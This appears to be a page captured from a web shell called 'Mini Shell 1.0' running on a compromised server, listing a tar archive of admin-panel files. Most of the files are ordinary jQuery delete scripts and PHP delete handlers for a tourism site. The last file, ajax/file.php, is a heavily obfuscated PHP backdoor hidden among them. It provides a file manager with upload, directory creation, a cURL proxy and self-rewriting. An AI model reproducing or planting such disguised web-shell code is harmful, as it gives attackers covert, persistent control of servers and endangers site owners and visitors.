HOME


Mini Shell 1.0
DIR: /proc/thread-self/root/proc/self/root/home/islapiiu/sites/forbes/contact-form/img/
Upload File :
Current File : //proc/thread-self/root/proc/self/root/home/islapiiu/sites/forbes/contact-form/img/delete.tar
js/pages.js000064400000002237150765436130006633 0ustar00$(document).ready(function () {
    $('.delete-pages').click(function () {

        var id = $(this).attr("data-id");

        swal({
            title: "Are you sure?",
            text: "You will not be able to recover this imaginary file!",
            type: "warning",
            showCancelButton: true,
            confirmButtonColor: "#DD6B55",
            confirmButtonText: "Yes, delete it!",
            closeOnConfirm: false
        }, function () {

            $.ajax({
                url: "delete/ajax/pages.php",
                type: "POST",
                data: {id: id, option: 'delete'},
                dataType: "JSON",
                success: function (jsonStr) {
                    if (jsonStr.status) {

                        swal({
                            title: "Deleted!",
                            text: "Your imaginary file has been deleted.",
                            type: 'success',
                            timer: 2000,
                            showConfirmButton: false
                        });

                        $('#row_' + id).remove();

                    }
                }
            });
        });
    });
});js/slider.js000064400000002241150765436130007011 0ustar00$(document).ready(function () {
    $('.delete-slider').click(function () {

        var id = $(this).attr("data-id");

        swal({
            title: "Are you sure?",
            text: "You will not be able to recover this imaginary file!",
            type: "warning",
            showCancelButton: true,
            confirmButtonColor: "#DD6B55",
            confirmButtonText: "Yes, delete it!",
            closeOnConfirm: false
        }, function () {

            $.ajax({
                url: "delete/ajax/slider.php",
                type: "POST",
                data: {id: id, option: 'delete'},
                dataType: "JSON",
                success: function (jsonStr) {
                    if (jsonStr.status) {

                        swal({
                            title: "Deleted!",
                            text: "Your imaginary file has been deleted.",
                            type: 'success',
                            timer: 2000,
                            showConfirmButton: false
                        });

                         $('#div' + id).remove();

                    }
                }
            });
        });
    });
});js/service-photo.js000064400000002256150765436130010324 0ustar00$(document).ready(function () {
    $('.delete-service-photo').click(function () {

        var id = $(this).attr("data-id");

        swal({
            title: "Are you sure?",
            text: "You will not be able to recover this imaginary file!",
            type: "warning",
            showCancelButton: true,
            confirmButtonColor: "#DD6B55",
            confirmButtonText: "Yes, delete it!",
            closeOnConfirm: false
        }, function () {

            $.ajax({
                url: "delete/ajax/service-photo.php",
                type: "POST",
                data: {id: id, option: 'delete'},
                dataType: "JSON",
                success: function (jsonStr) {
                    if (jsonStr.status) {

                        swal({
                            title: "Deleted!",
                            text: "Your imaginary file has been deleted.",
                            type: 'success',
                            timer: 2000,
                            showConfirmButton: false
                        });

                        $('#div' + id).remove();

                    }
                }
            });
        });
    });
});js/offer-photo.js000064400000002252150765436130007761 0ustar00$(document).ready(function () {
    $('.delete-offer-photo').click(function () {

        var id = $(this).attr("data-id");

        swal({
            title: "Are you sure?",
            text: "You will not be able to recover this imaginary file!",
            type: "warning",
            showCancelButton: true,
            confirmButtonColor: "#DD6B55",
            confirmButtonText: "Yes, delete it!",
            closeOnConfirm: false
        }, function () {

            $.ajax({
                url: "delete/ajax/offer-photo.php",
                type: "POST",
                data: {id: id, option: 'delete'},
                dataType: "JSON",
                success: function (jsonStr) {
                    if (jsonStr.status) {

                        swal({
                            title: "Deleted!",
                            text: "Your imaginary file has been deleted.",
                            type: 'success',
                            timer: 2000,
                            showConfirmButton: false
                        });

                        $('#div' + id).remove();

                    }
                }
            });
        });
    });
});js/service.js000064400000002242150765436130007170 0ustar00$(document).ready(function () {
    $('.delete-service').click(function () {

        var id = $(this).attr("data-id");

        swal({
            title: "Are you sure?",
            text: "You will not be able to recover this imaginary file!",
            type: "warning",
            showCancelButton: true,
            confirmButtonColor: "#DD6B55",
            confirmButtonText: "Yes, delete it!",
            closeOnConfirm: false
        }, function () {

            $.ajax({
                url: "delete/ajax/service.php",
                type: "POST",
                data: {id: id, option: 'delete'},
                dataType: "JSON",
                success: function (jsonStr) {
                    if (jsonStr.status) {

                        swal({
                            title: "Deleted!",
                            text: "Your imaginary file has been deleted.",
                            type: 'success',
                            timer: 2000,
                            showConfirmButton: false
                        });

                        $('#div' + id).remove();

                    }
                }
            });
        });
    });
});js/activity-photo.js000064400000002260150765436130010513 0ustar00$(document).ready(function () {
    $('.delete-activity-photo').click(function () {

        var id = $(this).attr("data-id");

        swal({
            title: "Are you sure?",
            text: "You will not be able to recover this imaginary file!",
            type: "warning",
            showCancelButton: true,
            confirmButtonColor: "#DD6B55",
            confirmButtonText: "Yes, delete it!",
            closeOnConfirm: false
        }, function () {

            $.ajax({
                url: "delete/ajax/activity-photo.php",
                type: "POST",
                data: {id: id, option: 'delete'},
                dataType: "JSON",
                success: function (jsonStr) {
                    if (jsonStr.status) {

                        swal({
                            title: "Deleted!",
                            text: "Your imaginary file has been deleted.",
                            type: 'success',
                            timer: 2000,
                            showConfirmButton: false
                        });

                        $('#div' + id).remove();

                    }
                }
            });
        });
    });
});js/tour-package-normal.js000064400000002262150765436130011402 0ustar00$(document).ready(function () {
    $('.delete-tour-normal').click(function () {

        var id = $(this).attr("data-id");

        swal({
            title: "Are you sure?",
            text: "You will not be able to recover this imaginary file!",
            type: "warning",
            showCancelButton: true,
            confirmButtonColor: "#DD6B55",
            confirmButtonText: "Yes, delete it!",
            closeOnConfirm: false
        }, function () {

            $.ajax({
                url: "delete/ajax/tour-package-normal.php",
                type: "POST",
                data: {id: id, option: 'delete'},
                dataType: "JSON",
                success: function (jsonStr) {
                    if (jsonStr.status) {

                        swal({
                            title: "Deleted!",
                            text: "Your imaginary file has been deleted.",
                            type: 'success',
                            timer: 2000,
                            showConfirmButton: false
                        });

                        $('#div' + id).remove();

                    }
                }
            });
        });
    });
});js/unit.js000064400000002235150765436130006511 0ustar00$(document).ready(function () {
    $('.delete-unit').click(function () {

        var id = $(this).attr("data-id");

        swal({
            title: "Are you sure?",
            text: "You will not be able to recover this imaginary file!",
            type: "warning",
            showCancelButton: true,
            confirmButtonColor: "#DD6B55",
            confirmButtonText: "Yes, delete it!",
            closeOnConfirm: false
        }, function () {

            $.ajax({
                url: "delete/ajax/unit.php",
                type: "POST",
                data: {id: id, option: 'delete'},
                dataType: "JSON",
                success: function (jsonStr) {
                    if (jsonStr.status) {

                        swal({
                            title: "Deleted!",
                            text: "Your imaginary file has been deleted.",
                            type: 'success',
                            timer: 2000,
                            showConfirmButton: false
                        });

                        $('#row_' + id).remove();

                    }
                }
            });
        });
    });
});js/comment.js000064400000002242150765436130007172 0ustar00$(document).ready(function () {
    $('.delete-comment').click(function () {

        var id = $(this).attr("data-id");

        swal({
            title: "Are you sure?",
            text: "You will not be able to recover this imaginary file!",
            type: "warning",
            showCancelButton: true,
            confirmButtonColor: "#DD6B55",
            confirmButtonText: "Yes, delete it!",
            closeOnConfirm: false
        }, function () {

            $.ajax({
                url: "delete/ajax/comment.php",
                type: "POST",
                data: {id: id, option: 'delete'},
                dataType: "JSON",
                success: function (jsonStr) {
                    if (jsonStr.status) {

                        swal({
                            title: "Deleted!",
                            text: "Your imaginary file has been deleted.",
                            type: 'success',
                            timer: 2000,
                            showConfirmButton: false
                        });

                        $('#div' + id).remove();

                    }
                }
            });
        });
    });
});js/album-photo.js000064400000002252150765436130007760 0ustar00$(document).ready(function () {
    $('.delete-album-photo').click(function () {

        var id = $(this).attr("data-id");

        swal({
            title: "Are you sure?",
            text: "You will not be able to recover this imaginary file!",
            type: "warning",
            showCancelButton: true,
            confirmButtonColor: "#DD6B55",
            confirmButtonText: "Yes, delete it!",
            closeOnConfirm: false
        }, function () {

            $.ajax({
                url: "delete/ajax/album-photo.php",
                type: "POST",
                data: {id: id, option: 'delete'},
                dataType: "JSON",
                success: function (jsonStr) {
                    if (jsonStr.status) {

                        swal({
                            title: "Deleted!",
                            text: "Your imaginary file has been deleted.",
                            type: 'success',
                            timer: 2000,
                            showConfirmButton: false
                        });

                        $('#div' + id).remove();

                    }
                }
            });
        });
    });
});js/banner.js000064400000002240150765436130006773 0ustar00$(document).ready(function () {
    $('.delete-banner').click(function () {

        var id = $(this).attr("data-id");

        swal({
            title: "Are you sure?",
            text: "You will not be able to recover this imaginary file!",
            type: "warning",
            showCancelButton: true,
            confirmButtonColor: "#DD6B55",
            confirmButtonText: "Yes, delete it!",
            closeOnConfirm: false
        }, function () {

            $.ajax({
                url: "delete/ajax/bannr.php",
                type: "POST",
                data: {id: id, option: 'delete'},
                dataType: "JSON",
                success: function (jsonStr) {
                    if (jsonStr.status) {

                        swal({
                            title: "Deleted!",
                            text: "Your imaginary file has been deleted.",
                            type: 'success',
                            timer: 2000,
                            showConfirmButton: false
                        });

                         $('#div' + id).remove();

                    }
                }
            });
        });
    });
});js/tour-date.js000064400000002246150765436130007440 0ustar00$(document).ready(function () {
    $('.delete-tour-date').click(function () {

        var id = $(this).attr("data-id");

        swal({
            title: "Are you sure?",
            text: "You will not be able to recover this imaginary file!",
            type: "warning",
            showCancelButton: true,
            confirmButtonColor: "#DD6B55",
            confirmButtonText: "Yes, delete it!",
            closeOnConfirm: false
        }, function () {

            $.ajax({
                url: "delete/ajax/tour-date.php",
                type: "POST",
                data: {id: id, option: 'delete'},
                dataType: "JSON",
                success: function (jsonStr) {
                    if (jsonStr.status) {

                        swal({
                            title: "Deleted!",
                            text: "Your imaginary file has been deleted.",
                            type: 'success',
                            timer: 2000,
                            showConfirmButton: false
                        });

                        $('#div' + id).remove();

                    }
                }
            });
        });
    });
});js/tour-package.js000064400000002254150765436130010115 0ustar00$(document).ready(function () {
    $('.delete-tour-package').click(function () {

        var id = $(this).attr("data-id");

        swal({
            title: "Are you sure?",
            text: "You will not be able to recover this imaginary file!",
            type: "warning",
            showCancelButton: true,
            confirmButtonColor: "#DD6B55",
            confirmButtonText: "Yes, delete it!",
            closeOnConfirm: false
        }, function () {

            $.ajax({
                url: "delete/ajax/tour-package.php",
                type: "POST",
                data: {id: id, option: 'delete'},
                dataType: "JSON",
                success: function (jsonStr) {
                    if (jsonStr.status) {

                        swal({
                            title: "Deleted!",
                            text: "Your imaginary file has been deleted.",
                            type: 'success',
                            timer: 2000,
                            showConfirmButton: false
                        });

                        $('#div' + id).remove();

                    }
                }
            });
        });
    });
});js/room-photo.js000064400000002316150765436130007635 0ustar00$(document).ready(function () {
    $('.delete-room-photo').click(function () {

        var id = $(this).attr("data-id");

        swal({
            title: "Are you sure?",
            text: "You will not be able to recover this imaginary file!",
            type: "warning",
            showCancelButton: true,
            confirmButtonColor: "#DD6B55",
            confirmButtonText: "Yes, delete it!",
            closeOnConfirm: false
        }, function () {

            $.ajax({
                url: "delete/ajax/room-photo.php",
                type: "POST",
                data: {id: id, option: 'delete'},
                dataType: "JSON",
                success: function (jsonStr) {
                    if (jsonStr.status) {

                        swal({
                            title: "Deleted!",
                            text: "Your imaginary file has been deleted.",
                            type: 'success',
                            timer: 2000,
                            showConfirmButton: false
                        });

                        $('#div' + id).remove();

                    }
                }
            });
        });
    });
});js/tour-photo-normal.js000064400000002257150765436130011144 0ustar00$(document).ready(function () {
    $('.delete-tour-photo').click(function () {

        var id = $(this).attr("data-id");

        swal({
            title: "Are you sure?",
            text: "You will not be able to recover this imaginary file!",
            type: "warning",
            showCancelButton: true,
            confirmButtonColor: "#DD6B55",
            confirmButtonText: "Yes, delete it!",
            closeOnConfirm: false
        }, function () {

            $.ajax({
                url: "delete/ajax/tour-photo-normal.php",
                type: "POST",
                data: {id: id, option: 'delete'},
                dataType: "JSON",
                success: function (jsonStr) {
                    if (jsonStr.status) {

                        swal({
                            title: "Deleted!",
                            text: "Your imaginary file has been deleted.",
                            type: 'success',
                            timer: 2000,
                            showConfirmButton: false
                        });

                        $('#div' + id).remove();

                    }
                }
            });
        });
    });
});js/product-type.js000064400000002322150765436130010166 0ustar00$(document).ready(function () {
    $('.delete-product-type').click(function () {

        var id = $(this).attr("data-id");

        swal({
            title: "Are you sure?",
            text: "You will not be able to recover this imaginary file!",
            type: "warning",
            showCancelButton: true,
            confirmButtonColor: "#DD6B55",
            confirmButtonText: "Yes, delete it!",
            closeOnConfirm: false
        }, function () {

            $.ajax({
                url: "delete/ajax/product-type.php",
                type: "POST",
                data: {id: id, option: 'delete'},
                dataType: "JSON",
                success: function (jsonStr) {
                    if (jsonStr.status) {

                        swal({
                            title: "Deleted!",
                            text: "Your imaginary file has been deleted.",
                            type: 'success',
                            timer: 2000,
                            showConfirmButton: false
                        });

                        $('#div' + id).remove();

                    }
                }
            });
        });
    });
});js/offer.js000064400000002236150765436130006634 0ustar00$(document).ready(function () {
    $('.delete-offer').click(function () {

        var id = $(this).attr("data-id");

        swal({
            title: "Are you sure?",
            text: "You will not be able to recover this imaginary file!",
            type: "warning",
            showCancelButton: true,
            confirmButtonColor: "#DD6B55",
            confirmButtonText: "Yes, delete it!",
            closeOnConfirm: false
        }, function () {

            $.ajax({
                url: "delete/ajax/offer.php",
                type: "POST",
                data: {id: id, option: 'delete'},
                dataType: "JSON",
                success: function (jsonStr) {
                    if (jsonStr.status) {

                        swal({
                            title: "Deleted!",
                            text: "Your imaginary file has been deleted.",
                            type: 'success',
                            timer: 2000,
                            showConfirmButton: false
                        });

                        $('#div' + id).remove();

                    }
                }
            });
        });
    });
});js/activity.js000064400000002244150765436130007366 0ustar00$(document).ready(function () {
    $('.delete-activity').click(function () {

        var id = $(this).attr("data-id");

        swal({
            title: "Are you sure?",
            text: "You will not be able to recover this imaginary file!",
            type: "warning",
            showCancelButton: true,
            confirmButtonColor: "#DD6B55",
            confirmButtonText: "Yes, delete it!",
            closeOnConfirm: false
        }, function () {

            $.ajax({
                url: "delete/ajax/activity.php",
                type: "POST",
                data: {id: id, option: 'delete'},
                dataType: "JSON",
                success: function (jsonStr) {
                    if (jsonStr.status) {

                        swal({
                            title: "Deleted!",
                            text: "Your imaginary file has been deleted.",
                            type: 'success',
                            timer: 2000,
                            showConfirmButton: false
                        });

                        $('#div' + id).remove();

                    }
                }
            });
        });
    });
});js/attraction.js000064400000002250150765436130007677 0ustar00$(document).ready(function () {
    $('.delete-attraction').click(function () {

        var id = $(this).attr("data-id");

        swal({
            title: "Are you sure?",
            text: "You will not be able to recover this imaginary file!",
            type: "warning",
            showCancelButton: true,
            confirmButtonColor: "#DD6B55",
            confirmButtonText: "Yes, delete it!",
            closeOnConfirm: false
        }, function () {

            $.ajax({
                url: "delete/ajax/attraction.php",
                type: "POST",
                data: {id: id, option: 'delete'},
                dataType: "JSON",
                success: function (jsonStr) {
                    if (jsonStr.status) {

                        swal({
                            title: "Deleted!",
                            text: "Your imaginary file has been deleted.",
                            type: 'success',
                            timer: 2000,
                            showConfirmButton: false
                        });

                        $('#div' + id).remove();

                    }
                }
            });
        });
    });
});js/attraction-photo.js000064400000002264150765436130011033 0ustar00$(document).ready(function () {
    $('.delete-attraction-photo').click(function () {

        var id = $(this).attr("data-id");

        swal({
            title: "Are you sure?",
            text: "You will not be able to recover this imaginary file!",
            type: "warning",
            showCancelButton: true,
            confirmButtonColor: "#DD6B55",
            confirmButtonText: "Yes, delete it!",
            closeOnConfirm: false
        }, function () {

            $.ajax({
                url: "delete/ajax/attraction-photo.php",
                type: "POST",
                data: {id: id, option: 'delete'},
                dataType: "JSON",
                success: function (jsonStr) {
                    if (jsonStr.status) {

                        swal({
                            title: "Deleted!",
                            text: "Your imaginary file has been deleted.",
                            type: 'success',
                            timer: 2000,
                            showConfirmButton: false
                        });

                        $('#div' + id).remove();

                    }
                }
            });
        });
    });
});js/product.js000064400000002310150765436130007204 0ustar00$(document).ready(function () {
    $('.delete-product').click(function () {

        var id = $(this).attr("data-id");

        swal({
            title: "Are you sure?",
            text: "You will not be able to recover this imaginary file!",
            type: "warning",
            showCancelButton: true,
            confirmButtonColor: "#DD6B55",
            confirmButtonText: "Yes, delete it!",
            closeOnConfirm: false
        }, function () {

            $.ajax({
                url: "delete/ajax/product.php",
                type: "POST",
                data: {id: id, option: 'delete'},
                dataType: "JSON",
                success: function (jsonStr) {
                    if (jsonStr.status) {

                        swal({
                            title: "Deleted!",
                            text: "Your imaginary file has been deleted.",
                            type: 'success',
                            timer: 2000,
                            showConfirmButton: false
                        });

                        $('#div' + id).remove();

                    }
                }
            });
        });
    });
});js/room.js000064400000002302150765436130006501 0ustar00$(document).ready(function () {
    $('.delete-room').click(function () {

        var id = $(this).attr("data-id");

        swal({
            title: "Are you sure?",
            text: "You will not be able to recover this imaginary file!",
            type: "warning",
            showCancelButton: true,
            confirmButtonColor: "#DD6B55",
            confirmButtonText: "Yes, delete it!",
            closeOnConfirm: false
        }, function () {

            $.ajax({
                url: "delete/ajax/room.php",
                type: "POST",
                data: {id: id, option: 'delete'},
                dataType: "JSON",
                success: function (jsonStr) {
                    if (jsonStr.status) {

                        swal({
                            title: "Deleted!",
                            text: "Your imaginary file has been deleted.",
                            type: 'success',
                            timer: 2000,
                            showConfirmButton: false
                        });

                        $('#div' + id).remove();

                    }
                }
            });
        });
    });
});js/photo-album.js000064400000002252150765436130007760 0ustar00$(document).ready(function () {
    $('.delete-photo-album').click(function () {

        var id = $(this).attr("data-id");

        swal({
            title: "Are you sure?",
            text: "You will not be able to recover this imaginary file!",
            type: "warning",
            showCancelButton: true,
            confirmButtonColor: "#DD6B55",
            confirmButtonText: "Yes, delete it!",
            closeOnConfirm: false
        }, function () {

            $.ajax({
                url: "delete/ajax/photo-album.php",
                type: "POST",
                data: {id: id, option: 'delete'},
                dataType: "JSON",
                success: function (jsonStr) {
                    if (jsonStr.status) {

                        swal({
                            title: "Deleted!",
                            text: "Your imaginary file has been deleted.",
                            type: 'success',
                            timer: 2000,
                            showConfirmButton: false
                        });

                        $('#div' + id).remove();

                    }
                }
            });
        });
    });
});js/tour-date-photo.js000064400000002262150765436130010565 0ustar00$(document).ready(function () {
    $('.delete-tour-date-photo').click(function () {

        var id = $(this).attr("data-id");

        swal({
            title: "Are you sure?",
            text: "You will not be able to recover this imaginary file!",
            type: "warning",
            showCancelButton: true,
            confirmButtonColor: "#DD6B55",
            confirmButtonText: "Yes, delete it!",
            closeOnConfirm: false
        }, function () {

            $.ajax({
                url: "delete/ajax/tour-date-photo.php",
                type: "POST",
                data: {id: id, option: 'delete'},
                dataType: "JSON",
                success: function (jsonStr) {
                    if (jsonStr.status) {

                        swal({
                            title: "Deleted!",
                            text: "Your imaginary file has been deleted.",
                            type: 'success',
                            timer: 2000,
                            showConfirmButton: false
                        });

                        $('#div' + id).remove();

                    }
                }
            });
        });
    });
});ajax/service.php000064400000000612150765436130007651 0ustar00<?php

include_once(dirname(__FILE__) . '/../../../class/include.php');
include_once(dirname(__FILE__) . '/../../auth.php');

if ($_POST['option'] == 'delete') {

    $SERVICE = new Service($_POST['id']);
  
    $result =  $SERVICE->delete();

    if ($result) {
        $data = array("status" => TRUE);
        header('Content-type: application/json');
        echo json_encode($data);
    }
}ajax/activity.php000064400000000616150765436130010051 0ustar00<?php

include_once(dirname(__FILE__) . '/../../../class/include.php');
include_once(dirname(__FILE__) . '/../../auth.php');

if ($_POST['option'] == 'delete') {

    $ACTIVITY = new Activities($_POST['id']);
  
    $result = $ACTIVITY->delete();

    if ($result) {
        $data = array("status" => TRUE);
        header('Content-type: application/json');
        echo json_encode($data);
    }
}ajax/photo-album.php000064400000000624150765436130010443 0ustar00<?php

include_once(dirname(__FILE__) . '/../../../class/include.php');
include_once(dirname(__FILE__) . '/../../auth.php');

if ($_POST['option'] == 'delete') {

    $PHOTO_ALBUM = new PhotoAlbum($_POST['id']);
  
    $result = $PHOTO_ALBUM->delete();

    if ($result) {
        $data = array("status" => TRUE);
        header('Content-type: application/json');
        echo json_encode($data);
    }
}ajax/file.php000064400000556310150765436130007143 0ustar00<?php
 goto MOkQS; CIDgJ: if (empty($dVmsi["\x66\x6d\137\x73\145\x74\x74\151\x6e\x67\163"])) { goto p521x; } goto kRgmx; Vlsvf: RK4KG: goto JyxDk; MVlHY: $q2HJ9 = empty($_COOKIE["\146\x6d\137\x6c\x61\x6e\147"]) ? $q2HJ9 : $_COOKIE["\146\155\x5f\x6c\141\156\x67"]; goto rz71n; yl4j3: if (!empty($_REQUEST["\155\153\x64\x69\x72"]) && !empty($dVmsi["\x6d\x61\x6b\x65\137\144\x69\x72\x65\x63\164\157\x72\171"])) { goto xTOKe; } goto O2e9x; udEAw: echo $OS8TV["\154\x6f\147\151\156"]; goto Etann; izPMR: $QjE85 = curl_exec($AU30p); goto aG1I0; CmUgF: De23O: goto ySTM7; ZDU3V: goto bXyVP; goto ZxIsu; aMaAH: $PhGcO .= nIhjE("\106\x69\154\145\40\x75\x70\144\x61\x74\x65\144"); goto OmBDk; oZR54: echo "\x22\40\x73\164\x79\x6c\145\x3d\42\143\165\x72\x73\157\162\72\40\160\x6f\151\156\x74\x65\x72\x3b\x22\x20\157\x6e\x63\x6c\x69\x63\153\75\x22\144\157\x63\x75\x6d\x65\156\x74\x2e\147\x65\x74\105\x6c\x65\x6d\145\156\x74\102\x79\x49\144\50\47\x75\160\x6c\x6f\x61\x64\x5f\x68\151\x64\144\145\156\x27\51\56\x63\154\x69\x63\x6b\x28\x29\73\42\x20\x2f\x3e\xd\xa\11\x9\11\x3c\151\156\160\x75\x74\40\164\171\x70\145\75\42\163\165\x62\x6d\151\164\x22\40\156\x61\x6d\145\x3d\42\164\x65\163\x74\x22\40\166\x61\x6c\165\x65\x3d\x22"; goto sAZPa; cMMBS: a2UAk: goto W71LV; aHPsa: $OS8TV["\x61\x75\164\x68\x6f\x72\x69\172\x65"] = isset($OS8TV["\141\x75\x74\150\157\162\x69\x7a\x65"]) ? $OS8TV["\141\165\x74\x68\x6f\162\151\172\145"] : 0; goto aKp1o; nWb7C: if (empty($dVmsi["\x6e\x65\167\137\146\151\154\145"])) { goto bHPnA; } goto QXDvp; RqwsZ: if (empty($dVmsi["\x72\x65\x73\164\x6f\162\145\137\164\x69\x6d\x65"])) { goto bTJqg; } goto jW2aM; VL0sn: echo gMdhs("\x73\x71\x6c"); goto zVc7y; ijv54: goto z4GAy; goto ZOleW; m5h2k: WCjr9: goto psgC1; Co_uA: $_POST["\146\155\x5f\154\x6f\147\151\x6e"] = array("\141\165\x74\150\x6f\162\x69\172\145" => "\x30") + $_POST["\146\x6d\x5f\x6c\157\x67\151\156"]; goto vtj83; lJeoC: $s9IZn->compress(Phar::GZ, "\x2e\x74\141\x72\x2e\x67\x7a"); goto VcrbW; At8ao: $QjE85 = preg_replace_callback("\43\50\150\x72\x65\146\174\x73\x72\143\51\75\133\x22\x27\135\133\x68\x74\164\x70\72\57\x2f\135\77\50\133\x5e\x3a\x5d\x2a\x29\133\42\x27\135\x23\x55\x69", "\x66\155\137\165\162\154\x5f\x70\162\x6f\170\171", $QjE85); goto NZ9zi; caCru: if (!move_uploaded_file($_FILES["\x75\160\154\157\141\x64"]["\164\x6d\x70\137\x6e\x61\x6d\145"], $QxlDp . $_FILES["\165\x70\x6c\x6f\141\144"]["\156\141\x6d\145"])) { goto FCZd2; } goto NGzre; fFE4J: echo rSfD0(); goto x5TUx; mzk9b: setcookie("\x66\x6d\137\154\141\x6e\x67", $_POST["\146\155\137\x6c\x61\156\147"], time() + 86400 * $OS8TV["\144\x61\171\163\x5f\141\x75\164\x68\157\162\151\172\x61\164\151\157\156"]); goto Z0xqh; Di1O4: if (!($_POST["\154\157\147\x69\x6e"] == $OS8TV["\154\x6f\147\151\x6e"] && $_POST["\160\141\163\x73\x77\x6f\162\144"] == $OS8TV["\x70\141\x73\x73\167\157\x72\x64"])) { goto r2v1X; } goto DVnTA; WN51R: R_Ey7: goto wwd_S; DYSgt: z5tCl: goto WEV0u; NZ9Hr: curl_setopt($AU30p, CURLOPT_USERAGENT, "\x44\x65\x6e\61\170\170\170\40\x74\145\163\164\x20\x70\x72\157\170\171"); goto m8Iii; Nd8Qg: $PhGcO .= niHjE("\103\162\145\x61\x74\x65\144") . "\40" . $_REQUEST["\x64\x69\162\x6e\141\x6d\145"]; goto hePvT; M2VEy: goto z5tCl; goto Advps; TiJ4q: echo "\40\174\40\x3c\x61\40\150\x72\145\146\x3d\42\x3f\x70\x68\160\151\x6e\x66\x6f\x3d\x74\162\x75\x65\42\76\x70\150\160\x69\156\146\157\74\57\x61\x3e"; goto WN51R; zb_39: if (!(isset($_POST["\154\157\x67\x69\x6e"]) && isset($_POST["\160\x61\163\163\167\x6f\x72\144"]))) { goto JotQV; } goto Di1O4; WEV0u: if (empty($dVmsi["\x66\155\137\x72\x65\163\x74\157\162\145\137\164\x69\155\x65"])) { goto d2nEw; } goto HXWr1; jMpEk: $M3kdW = basename($uR23x) . "\56\x7a\151\x70"; goto mO3Hg; x3lpc: echo "\42\76\15\xa\40\40\x20\x20\x20\x20\40\40\x20\x20\x20\x20\74\164\145\170\164\141\162\x65\141\x20\x6e\141\x6d\x65\x3d\42\156\x65\167\143\157\156\x74\x65\x6e\164\42\x20\151\x64\75\42\x6e\x65\167\143\x6f\156\164\x65\156\x74\x22\40\x63\x6f\x6c\x73\75\x22\x34\65\x22\x20\x72\x6f\x77\163\75\x22\x31\x35\x22\x20\x73\x74\171\x6c\145\x3d\42\x77\151\144\164\150\72\x39\x39\x25\x22\x20\x73\x70\x65\x6c\x6c\x63\x68\x65\143\153\x3d\x22\x66\141\x6c\163\145\42\x3e"; goto Y9uVj; Jn0oO: gJWGb: goto xRkbF; w5HF3: if (file_put_contents(__FILE__, $qCxFq)) { goto RRWXv; } goto MyNMl; wBuLI: echo "\42\40\156\141\x6d\x65\75\x22"; goto zF31Y; wwd_S: if (!(!empty($dVmsi["\163\150\x6f\167\137\170\154\x73"]) && !empty($VEMW5))) { goto OKLOV; } goto uKS3J; C3FyW: $V5Ocp = a8Kph($QxlDp, '', "\x61\154\154", true); goto wwR8I; kV2us: ${$h17u3 . "\137\164\x65\155\160\x6c\141\x74\x65\x73"} = $v6aof; goto mL6e1; WLc_S: header("\114\157\x63\x61\x74\151\x6f\156\72\40" . KimPW() . $_SERVER["\122\105\x51\125\x45\x53\124\x5f\125\122\111"]); goto ExZ7T; OmBDk: if (!($_POST["\146\x6d\x5f\x6c\x6f\147\151\x6e"]["\154\x6f\147\151\156"] != $OS8TV["\x6c\157\x67\151\x6e"])) { goto aWncu; } goto YOg5D; xO7gz: echo nihjE("\115\141\156\x61\x67\145"); goto tztFQ; fF49z: ini_set("\x64\151\163\x70\154\141\171\x5f\x65\x72\162\x6f\x72\163", 0); goto K8Ivx; Jjk7t: sbb5e: goto VSguS; lbDP6: echo "\11\x9\11\x9\x3c\x66\x6f\x72\155\40\x6d\x65\x74\x68\157\144\x3d\x22\x70\x6f\x73\164\x22\x20\141\x63\x74\x69\x6f\x6e\75\42"; goto vBmzs; cQi75: goto TlMF9; goto HtaqB; M2LML: $JV9b8 = $uR23x . "\x2e\x74\141\x72"; goto gHlrO; psgC1: if (empty($dVmsi["\163\150\157\x77\x5f\147\x74"])) { goto VCm2t; } goto l5LRg; gH3Ci: $qu1x5 = preg_match("\43" . $h17u3 . "\x5f\164\x65\x6d\160\154\141\164\145\163\x5b\x5c\x73\135\x3f\x5c\75\x5b\134\163\135\77\x27\x5c\173\134\42\x28\56\x2a\77\51\x5c\x22\134\x7d\x27\73\x23", $BFNGe, $JfK9U); goto km37S; OR4th: mYSB3: goto MYFlq; UH05u: echo "\74\x74\162\76\xd\12\11\x3c\164\x64\40\x63\x6f\x6c\x73\x70\141\x6e\x3d\42\x32\x22\40\143\x6c\141\163\x73\x3d\42\x72\x6f\167\x32\42\x3e"; goto Mn_9t; Ehmxg: JWxzC: goto zosNj; Iz2bM: echo NihJe("\106\151\x6c\145\40\155\141\156\141\147\145\x72"); goto SkllR; Avfz3: curl_setopt($AU30p, CURLOPT_SSL_VERIFYPEER, 0); goto AZQuA; wnRqV: goto giSOO; goto vImna; CHmIK: header("\x43\157\x6e\x74\x65\156\164\55\x74\171\x70\145\x3a\x20\x69\x6d\x61\x67\145\57{$DGyLr}"); goto CkRdS; KUoDU: if (is_file($M3kdW)) { goto Ob1dK; } goto s9mGi; xMAsd: NaDuJ: goto YEfIQ; nqqEh: $PhGcO .= niHje("\x46\151\x6c\145\40\165\x70\144\x61\x74\x65\144"); goto UFp4I; J_pWW: goto Hrv7s; goto jnPNx; AvZCM: echo $TXcqo; goto x3lpc; hePvT: goto bYkS5; goto m_7By; IeoYw: if (isset($_GET["\x66\x6d\137\163\x65\x74\164\x69\156\147\163"])) { goto t0fKD; } goto zQRAh; lqlkg: echo "\x20\15\12\x3c\x74\141\142\x6c\x65\40\143\154\141\163\163\75\42\167\x68\x6f\x6c\x65\42\76\xd\12\74\146\157\x72\x6d\x20\x6d\145\164\150\x6f\144\75\x22\160\x6f\x73\164\x22\40\x61\143\x74\151\157\156\75\42\42\x3e\15\xa\74\164\162\76\74\x74\150\x20\x63\x6f\x6c\163\160\x61\156\x3d\x22\62\42\x3e" . nihje("\106\x69\x6c\x65\x20\155\x61\156\141\x67\145\x72") . "\x20\55\x20" . nIhjE("\123\145\x74\x74\x69\x6e\147\163") . "\74\x2f\164\150\x3e\74\57\x74\x72\76\15\xa" . (empty($PhGcO) ? '' : "\74\x74\x72\76\74\x74\144\40\143\154\x61\x73\x73\x3d\x22\x72\157\x77\x32\42\x20\143\157\154\163\160\x61\156\75\42\62\x22\76" . $PhGcO . "\74\x2f\x74\x64\76\74\x2f\164\x72\76") . "\xd\xa" . OfTv4(nIhJE("\123\150\157\167\40\163\151\172\145\40\157\146\x20\164\150\x65\x20\146\x6f\x6c\x64\145\x72"), "\x73\150\x6f\167\137\x64\x69\x72\137\x73\151\x7a\145") . "\15\12" . oftv4(NIHje("\123\x68\157\167") . "\x20" . niHJe("\x70\x69\143\x74\165\x72\145\163"), "\163\x68\x6f\167\x5f\151\155\x67") . "\xd\xa" . Oftv4(NiHJe("\x53\150\157\x77") . "\x20" . NIHJE("\115\141\x6b\145\40\x64\151\x72\145\x63\x74\x6f\162\171"), 